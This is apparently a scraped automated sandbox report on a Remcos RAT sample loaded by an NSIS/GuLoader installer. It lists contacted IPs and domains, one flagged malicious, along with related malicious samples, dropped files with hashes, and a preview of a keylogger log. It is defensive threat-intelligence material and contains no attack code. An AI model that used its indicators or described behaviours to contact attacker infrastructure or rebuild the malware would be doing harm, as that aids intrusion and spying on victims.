              https://www.google.comwab.exe, wab.exe, 0000000E.00000002.216327200289.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000012.00000002.216848985891.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000016.00000002.217151779089.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://github.com/Pester/Pester4powershell.exe, 00000007.00000002.216288846699.0000000005077000.00000004.00000800.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://nsis.sf.net/NSIS_ErrorUundgaaelige.exe, Uundgaaelige.exe.7.drfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://aka.ms/pscore6lBpowershell.exe, 00000007.00000002.216288846699.0000000004F21000.00000004.00000800.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://contoso.com/powershell.exe, 00000007.00000002.216292884259.0000000005F8F000.00000004.00000800.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://nuget.org/nuget.exepowershell.exe, 00000007.00000002.216292884259.0000000005F8F000.00000004.00000800.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://www.imvu.com/Xr=wab.exe, 0000000E.00000002.216327420797.000000000309C000.00000004.00000010.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://www.google.com/accounts/serviceloginwab.exefalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://login.yahoo.com/config/loginwab.exefalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://www.nirsoft.net/wab.exe, 00000016.00000002.217151779089.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://www.imvu.com/Pnwab.exe, 00000016.00000002.217151981558.0000000002BCC000.00000004.00000010.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.imvu.comatawab.exe, 0000000E.00000002.216328189876.00000000037FD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000002.216849855991.000000000350D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000016.00000002.217152613364.00000000034BD000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000007.00000002.216288846699.0000000004F21000.00000004.00000800.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://www.ebuddy.comwab.exe, wab.exe, 0000000E.00000002.216327200289.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000012.00000002.216848985891.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000016.00000002.217151779089.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown

              World Map of Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public IPs

              IPDomainCountryFlagASNASN NameMalicious
              209.90.237.48
              		unknownUnited States
              		136175SERVERHOSH-AS-APServerhoshInternetServiceNLfalse
              178.237.33.50
              		geoplugin.netNetherlands
              		8455ATOM86-ASATOM86NLfalse
              172.93.222.25
              		unknownUnited States
              		23033WOWUStrue

              General Information

              Joe Sandbox version:40.0.0 Tourmaline
              Analysis ID:1473335
              Start date and time:2024-07-15 09:21:22 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 15m 40s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2021, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
              Run name:Suspected Instruction Hammering
              Number of analysed new started processes analysed:27
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:Uundgaaelige.exe
              Detection:MAL
              Classification:mal100.phis.troj.spyw.evad.winEXE@31/29@1/3
              EGA Information:
              • Successful, ratio: 80%
              HCA Information:
              • Successful, ratio: 97%
              • Number of executed functions: 220
              • Number of non-executed functions: 221
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
              • Stop behavior analysis, all processes terminated

              Warnings

              • Exclude process from analysis (whitelisted): dllhost.exe, HxTsr.exe, WerFault.exe, RuntimeBroker.exe, backgroundTaskHost.exe, svchost.exe
              • Excluded IPs from analysis (whitelisted): 20.42.73.29
              • Excluded domains from analysis (whitelisted): assets.msn.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, nexusrules.officeapps.live.com, api.msn.com
              • Execution Graph export aborted for target powershell.exe, PID 8572 because it is empty
              • Not all processes where analyzed, report is missing behavior information
              • Report size exceeded maximum capacity and may have missing behavior information.
              • Report size exceeded maximum capacity and may have missing disassembly code.
              • Report size exceeded maximum capacity and may have missing network information.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • Report size getting too big, too many NtReadVirtualMemory calls found.
              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

              Simulations

              Behavior and APIs

              TimeTypeDescription
              03:24:29API Interceptor4338175x Sleep call for process: wab.exe modified

              Joe Sandbox View / Context

              IPs

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              178.237.33.50BBVA Colombia__ Aviso de Pago.pdf.bat.exeGet hashmaliciousRemcosBrowse
              • geoplugin.net/json.gp
              5046511eb489387b7a835a990ea3b36b77185f3fad905511c4bce30aa654c60b_dump.exeGet hashmaliciousRemcosBrowse
              • geoplugin.net/json.gp
              aqB7l6kvXl.exeGet hashmaliciousRemcosBrowse
              • geoplugin.net/json.gp
              PO 11072024.exeGet hashmaliciousRemcosBrowse
              • geoplugin.net/json.gp
              mg9LPWGtPB.exeGet hashmaliciousRemcos, VidarBrowse
              • geoplugin.net/json.gp
              crosscheckrosefloweronhairbeauty.gIF.vbsGet hashmaliciousRemcosBrowse
              • geoplugin.net/json.gp
              RFQ24060084#U00b7pdf.exeGet hashmaliciousRemcos, GuLoaderBrowse
              • geoplugin.net/json.gp
              IT01879020517_uGIim_xml#U00b7pdf.exeGet hashmaliciousRemcosBrowse
              • geoplugin.net/json.gp
              swCQS5MMLX.rtfGet hashmaliciousRemcosBrowse
              • geoplugin.net/json.gp
              HOU3ED3EDRFQ.exeGet hashmaliciousRemcosBrowse
              • geoplugin.net/json.gp

              Domains

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              geoplugin.netBBVA Colombia__ Aviso de Pago.pdf.bat.exeGet hashmaliciousRemcosBrowse
              • 178.237.33.50
              5046511eb489387b7a835a990ea3b36b77185f3fad905511c4bce30aa654c60b_dump.exeGet hashmaliciousRemcosBrowse
              • 178.237.33.50
              aqB7l6kvXl.exeGet hashmaliciousRemcosBrowse
              • 178.237.33.50
              PO 11072024.exeGet hashmaliciousRemcosBrowse
              • 178.237.33.50
              mg9LPWGtPB.exeGet hashmaliciousRemcos, VidarBrowse
              • 178.237.33.50
              crosscheckrosefloweronhairbeauty.gIF.vbsGet hashmaliciousRemcosBrowse
              • 178.237.33.50
              RFQ24060084#U00b7pdf.exeGet hashmaliciousRemcos, GuLoaderBrowse
              • 178.237.33.50
              IT01879020517_uGIim_xml#U00b7pdf.exeGet hashmaliciousRemcosBrowse
              • 178.237.33.50
              swCQS5MMLX.rtfGet hashmaliciousRemcosBrowse
              • 178.237.33.50
              HOU3ED3EDRFQ.exeGet hashmaliciousRemcosBrowse
              • 178.237.33.50

              ASNs

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              WOWUSconfirmaci#U00f3n y correcci#U00f3n de la direcci#U00f3n de entrega.vbsGet hashmaliciousUnknownBrowse
              • 192.169.69.26
              1719856386e096b43fb21cb60b35b1c75e594b0a5e5d9e5cf67925969c620467d3153095d7550.dat-decoded.exeGet hashmaliciousAsyncRATBrowse
              • 192.169.69.26
              ._cache_1.exeGet hashmaliciousNjratBrowse
              • 192.169.69.25
              6f2b0a1890381cd7f98f920e2ecca11d2cc54f0e50c85.exeGet hashmaliciousNjratBrowse
              • 192.169.69.25
              oKtkBYZMWl.exeGet hashmaliciousUnknownBrowse
              • 192.169.69.26
              oKtkBYZMWl.exeGet hashmaliciousUnknownBrowse
              • 192.169.69.26
              Payment_Copy_Document#474790.jsGet hashmaliciousXWormBrowse
              • 172.93.222.235
              Revised_June_Order_Document#po839203.jsGet hashmaliciousAgentTesla, SugarDump, XWormBrowse
              • 172.93.222.235
              0GdQRdPT2h.exeGet hashmaliciousNanocoreBrowse
              • 192.169.69.26
              https://netfflx-polska.duckdns.org/loga/index_pl.phpGet hashmaliciousUnknownBrowse
              • 192.169.69.26
              SERVERHOSH-AS-APServerhoshInternetServiceNLORDERDATASHEET#PO8738763.scr.exeGet hashmaliciousAgentTesla, RedLine, SugarDump, XWormBrowse
              • 209.90.234.57
              Palmebladstag.exeGet hashmaliciousRemcos, GuLoaderBrowse
              • 209.90.234.58
              01-05-24 remittance.exeGet hashmaliciousGuLoaderBrowse
              • 209.90.233.2
              87tBuE42ft.exeGet hashmaliciousRemcos, GuLoaderBrowse
              • 209.90.234.20
              http://213.139.205.131/update_verGet hashmaliciousUnknownBrowse
              • 213.139.205.131
              http://213.139.205.131/w_ver.datGet hashmaliciousUnknownBrowse
              • 213.139.205.131
              http://213.139.205.131/update_verGet hashmaliciousUnknownBrowse
              • 213.139.205.131
              ReleaseEvans#27.docmGet hashmaliciousUnknownBrowse
              • 213.139.205.131
              Application#89.docmGet hashmaliciousUnknownBrowse
              • 213.139.205.131
              ReleaseEvans#90.docmGet hashmaliciousUnknownBrowse
              • 213.139.205.131
              ATOM86-ASATOM86NLBBVA Colombia__ Aviso de Pago.pdf.bat.exeGet hashmaliciousRemcosBrowse
              • 178.237.33.50
              5046511eb489387b7a835a990ea3b36b77185f3fad905511c4bce30aa654c60b_dump.exeGet hashmaliciousRemcosBrowse
              • 178.237.33.50
              aqB7l6kvXl.exeGet hashmaliciousRemcosBrowse
              • 178.237.33.50
              PO 11072024.exeGet hashmaliciousRemcosBrowse
              • 178.237.33.50
              mg9LPWGtPB.exeGet hashmaliciousRemcos, VidarBrowse
              • 178.237.33.50
              crosscheckrosefloweronhairbeauty.gIF.vbsGet hashmaliciousRemcosBrowse
              • 178.237.33.50
              RFQ24060084#U00b7pdf.exeGet hashmaliciousRemcos, GuLoaderBrowse
              • 178.237.33.50
              IT01879020517_uGIim_xml#U00b7pdf.exeGet hashmaliciousRemcosBrowse
              • 178.237.33.50
              swCQS5MMLX.rtfGet hashmaliciousRemcosBrowse
              • 178.237.33.50
              HOU3ED3EDRFQ.exeGet hashmaliciousRemcosBrowse
              • 178.237.33.50

              JA3 Fingerprints

              No context

              Dropped Files

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              C:\Users\user\AppData\Local\Temp\nsa17F6.tmp\nsDialogs.dllRFQ#NEWORDER-SP-21-091-003-ASIA SUPPLY.comGet hashmaliciousRemcos, GuLoaderBrowse
                RFQ#NEWORDER-SP-21-091-003-ASIA SUPPLY.comGet hashmaliciousGuLoaderBrowse
                  RFQ#ORDER-PRODUCTION-24-091-06 -SUPPLY.com.exeGet hashmaliciousRemcos, GuLoaderBrowse
                    VSL'S PARTICULARS FOR TRUE-COMPASS V2406.docx.com.exeGet hashmaliciousRemcos, GuLoaderBrowse
                      RFQ#NEWORDER-SP-21-091-003-ASIA SUPPLY.com.exeGet hashmaliciousRemcos, GuLoaderBrowse
                        RFQ#ORDER-PRODUCTION-24-091-06 -SUPPLY.com.exeGet hashmaliciousGuLoaderBrowse
                          VSL'S PARTICULARS FOR TRUE-COMPASS V2406.docx.com.exeGet hashmaliciousGuLoaderBrowse
                            RFQ#NEWORDER-SP-21-091-003-ASIA SUPPLY.com.exeGet hashmaliciousGuLoaderBrowse
                              ______-POORD210865679-09XY-21-Order.com.exeGet hashmaliciousGuLoaderBrowse
                                C:\Users\user\AppData\Local\Temp\nsa17F6.tmp\BgImage.dllr14836901-5B4A-.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                  r14836901-5B4A-.exeGet hashmaliciousGuLoaderBrowse
                                    Bootblacks.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                      Bootblacks.exeGet hashmaliciousGuLoaderBrowse
                                        Halkbank_Ekstre_06535798_98742134.pdf.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                          Halkbank_Ekstre_87762122_97575533.pdf.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                            C:\Users\user\AppData\Local\Temp\nsa17F6.tmp\UserInfo.dllDriverUpdate.exeGet hashmaliciousUnknownBrowse
                                              DSOneApp(1).exeGet hashmaliciousUnknownBrowse

                                                Created / dropped Files

                                                C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_wab.exe_884f44aaaa2cf32aaa726fbb10c339336d871afd_36a3b50f_7658e822-8de1-451a-bb5d-31e70b2c587d\Report.wer

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):1.0122032384651958
                                                Encrypted:false
                                                SSDEEP:192:8jbAaUTYCQmBUWIjC3o2Z2Du76ffAIO8o:AbABTYCZBUWIjfDu76ffAIO8o
                                                MD5:5E5F88E2C799705CEC695E7F6C4334B3
                                                SHA1:9AC2809F41E84DA9A1DC195B2EC532DEE0503143
                                                SHA-256:39E40D28040B23E1DE6C1C05376E41BA7C384C7EDB553A9A7391A5674C218CFB
                                                SHA-512:6DF7EC2D284B0777B4CC79AC17B4F91B58561FA640390B04CD7F74C8EDF67B54EEA873D1F12BA62ED8359CC67AB3BF25AD50C49D4FEC7553C08F0AF59F81EEA9
                                                Malicious:false
                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.5.5.0.1.9.5.1.3.6.6.0.2.6.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.5.5.0.1.9.5.1.7.7.2.1.8.8.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.6.5.8.e.8.2.2.-.8.d.e.1.-.4.5.1.a.-.b.b.5.d.-.3.1.e.7.0.b.2.c.5.8.7.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.4.1.f.8.9.4.a.-.c.0.4.f.-.4.1.3.7.-.a.a.6.e.-.f.7.4.e.f.e.b.f.c.8.3.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.w.a.b...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.W.A.B...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.2.2.2.4.-.0.0.0.1.-.0.0.3.2.-.4.d.c.5.-.c.7.e.f.8.7.d.6.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.6.7.7.a.3.5.6.6.7.8.9.d.4.d.a.5.4.5.9.a.1.e.c.d.0.1.a.2.9.7.c.2.6.1.a.1.3.3.a.2.!.w.a.b...e.x.

                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER5C75.tmp.dmp

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Mini DuMP crash report, 14 streams, Mon Jul 15 07:25:51 2024, 0x1205a4 type
                                                Category:dropped
                                                Size (bytes):142988
                                                Entropy (8bit):1.8696994812417487
                                                Encrypted:false
                                                SSDEEP:384:lHe5fAvGJCLNkcl53MiHCKvrTMpcKe10LlWl9y5oQCf2rXMs3u1:lHehAvGwLTl59iKjTMGKenbfuy
                                                MD5:54C55A027FA73173279B2966AC959E1D
                                                SHA1:08AB5D6D3B29E55C9EF5E4EF39DA59792D1BE204
                                                SHA-256:071B5B8A081119A03C176B9CB969F0C55054E0F797F63A7E1FCBA2E78D81A7BA
                                                SHA-512:C30189B8FF94A38EDC8FE4F62F2E09A2836B912C3BABE45C11153D38E430B6F1135DC9A15BE3497D13793E84B62628F500AC8D5459F02F07DA9E686DB528C96C
                                                Malicious:false
                                                Preview:MDMP..a..... .........f........................|...............(X..........T.......8...........T............=..............X"..........D$..............................................................................bJ.......$......GenuineIntel...........T.......$"....f....Z........................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER5D41.tmp.WERInternalMetadata.xml

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):6310
                                                Entropy (8bit):3.719743755828913
                                                Encrypted:false
                                                SSDEEP:192:R9l7lZNiSrm6GFEYjsECmprRL89bBrBYsfobcrm:R9lnNiSK6GFEYjsEpsBRfobd
                                                MD5:7B4A2C6B50062DB851D39219B3F4F7DB
                                                SHA1:28EB0F9C808FC88E7CE962992F7C6AAB91153AAF
                                                SHA-256:45AEC2198018B22A7A57446C242EB4C66EFF1AFDCB0A43FF3814272D882C1717
                                                SHA-512:E6F09D677C6A633E820792850BA5D493C6879A4D03BBB5BF8D2E6F82B59F46AA288B4EA3AB1ADBE1AB0CF983755455E477024BEB35BC940B1DDB5A97833825AF
                                                Malicious:false
                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.2.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...1.1.6.5...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.1.6.5.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.8.7.4.0.<./.P.i.

                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER5D61.tmp.xml

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):4763
                                                Entropy (8bit):4.472361745821808
                                                Encrypted:false
                                                SSDEEP:48:cvIwwtl8zsKe702I7VFJ5Ws2mYrTs3rm8M4JamvPFZB+q8hQLDR7I44d:uILfv7GysbYmJaMBCQ/Rk44d
                                                MD5:E49CFA3592E78E37E0316C612DB440EC
                                                SHA1:8EC457275F08F9F277A6AD19CC5E7511B75C4A3A
                                                SHA-256:32F97EAD96228165B22DBF6909AE065307C8F6B01EEDE6185C8E46DD3E13B1C8
                                                SHA-512:189B19A50ED018A73102A2017073DA48500BAB39D2D3F6A887E213572B64694E5EA473C1492822BDA1DA6C54C90E01BEB00DD4B3266900933225DEAFE0FFDD00
                                                Malicious:false
                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19042" />.. <arg nm="vercsdbld" val="1165" />.. <arg nm="verqfe" val="1165" />.. <arg nm="csdbld" val="1165" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="242" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="222755648" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="

                                                C:\ProgramData\remcos\logs.dat

                                                Download File
                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):144
                                                Entropy (8bit):3.38816599775145
                                                Encrypted:false
                                                SSDEEP:3:rhlKlVRFNPU5JWRal2Jl+7R0DAlBG45klovDl6v:6lVRU5YcIeeDAlOWAv
                                                MD5:E9C0FF3D3CD817293D4152ACA59CBA43
                                                SHA1:CCD89BCEEC47710CEA252201F71A5190ED1D1623
                                                SHA-256:35E9073E9931B4D040D9DC324B7F16220D6B3E8B0AB0B6187ECD36B82E86D7E0
                                                SHA-512:21A15C2B65983680C9CF9A097FD77047477A05B1DC2CCA8C0E19803D150091C94D438ED0A1E99B133E9E7C5884C64018EE996DFA6C8C80974E7898F985C80699
                                                Malicious:true
                                                Yara Hits:
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                Preview:....[.2.0.2.4./.0.7./.1.5. .0.3.:.2.3.:.5.7. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LS0J5B3T\json[1].json

                                                Download File
                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                File Type:JSON data
                                                Category:dropped
                                                Size (bytes):974
                                                Entropy (8bit):4.981925787151735
                                                Encrypted:false
                                                SSDEEP:12:tklund6UGkMyGWKyGXPVGArwY34MaUHZGgArpv/mOAaNO+ao9W7iN5zzkw7Rp9Jk:qlidVauKyGX85pvXhNlT3/7p0hdsro
                                                MD5:B5F03A2120A9F1946A9D9CD0D869B6E9
                                                SHA1:CAF50A7CFF92657C8C86A8992342AC4823CE1BF2
                                                SHA-256:A6F856D1EDD8D5F04BB3D12C3B9DCB3329606A93BB3A69C1715D648DE161B741
                                                SHA-512:A528724691AFA49EBEEF96EAC49450FE61FAABFA4B4A78F5208D816B2E47ED2C8343E15316CED3363DF4DF64E85174231A674D0F6C0866604004CA249A6478D4
                                                Malicious:false
                                                Preview:{. "geoplugin_request":"81.181.54.64",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Los Angeles",. "geoplugin_region":"California",. "geoplugin_regionCode":"CA",. "geoplugin_regionName":"California",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"803",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"34.0544",. "geoplugin_longitude":"-118.2441",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/Los_Angeles",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                Download File
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:modified
                                                Size (bytes):8003
                                                Entropy (8bit):4.840877972214509
                                                Encrypted:false
                                                SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                                                MD5:106D01F562D751E62B702803895E93E0
                                                SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                                                SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                                                SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                                                Malicious:false
                                                Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l30rgmfk.iwy.psm1

                                                Download File
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x1xaarnr.pez.ps1

                                                Download File
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                C:\Users\user\AppData\Local\Temp\bhv7A81.tmp

                                                Download File
                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                File Type:Extensible storage engine DataBase, version 0x620, checksum 0x33f90050, page size 32768, DirtyShutdown, Windows version 10.0
                                                Category:dropped
                                                Size (bytes):14680064
                                                Entropy (8bit):0.12080190500521996
                                                Encrypted:false
